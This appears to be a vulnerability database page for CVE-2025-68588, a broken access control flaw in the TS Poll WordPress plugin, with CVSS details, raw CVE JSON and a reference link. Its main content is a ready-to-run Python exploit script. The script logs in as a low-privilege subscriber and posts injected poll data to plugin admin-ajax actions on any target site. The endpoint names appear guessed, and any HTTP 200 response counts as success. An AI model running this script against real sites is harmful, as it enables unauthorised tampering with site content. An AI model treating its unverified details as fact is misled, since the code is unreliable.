Security Vulnerability Report
中文
CVE-2025-68588 CVSS 4.3 MEDIUM

CVE-2025-68588

Published: 2025-12-24 13:16:26
Last Modified: 2026-04-27 19:16:34

Description

Missing Authorization vulnerability in totalsoft TS Poll poll-wp allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects TS Poll: from n/a through <= 2.5.5.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

TS Poll (WordPress plugin) <= 2.5.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68588 PoC - TS Poll Broken Access Control # Target: WordPress site with TS Poll plugin <= 2.5.5 # This PoC demonstrates how a low-privilege user can exploit missing authorization import requests import sys def exploit_ts_poll(target_url, username, password): """ Exploit missing authorization in TS Poll plugin Low-privilege user can perform admin actions """ session = requests.Session() # Step 1: Login as low-privilege user (subscriber role) login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies: print("[-] Login failed") return False print("[+] Logged in as low-privilege user") # Step 2: Exploit broken access control # Try to access admin functionality without proper authorization admin_endpoints = [ '/wp-admin/admin-ajax.php?action=ts_poll_save', '/wp-admin/admin-ajax.php?action=ts_poll_delete', '/wp-admin/admin-ajax.php?action=ts_poll_create' ] for endpoint in admin_endpoints: exploit_url = f"{target_url}{endpoint}" exploit_data = { 'poll_id': '1', 'poll_question': 'Injected Question', 'poll_answers': ['Answer 1', 'Answer 2'] } response = session.post(exploit_url, data=exploit_data) if response.status_code == 200: print(f"[+] Successfully accessed: {endpoint}") print(f"[+] Response: {response.text[:200]}") return True if __name__ == '__main__': if len(sys.argv) < 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") print(f"Example: python {sys.argv[0]} http://example.com subscriber password123") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_ts_poll(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68588", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:26.100", "lastModified": "2026-04-27T19:16:34.297", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in totalsoft TS Poll poll-wp allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects TS Poll: from n/a through <= 2.5.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/poll-wp/vulnerability/wordpress-ts-poll-plugin-2-5-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}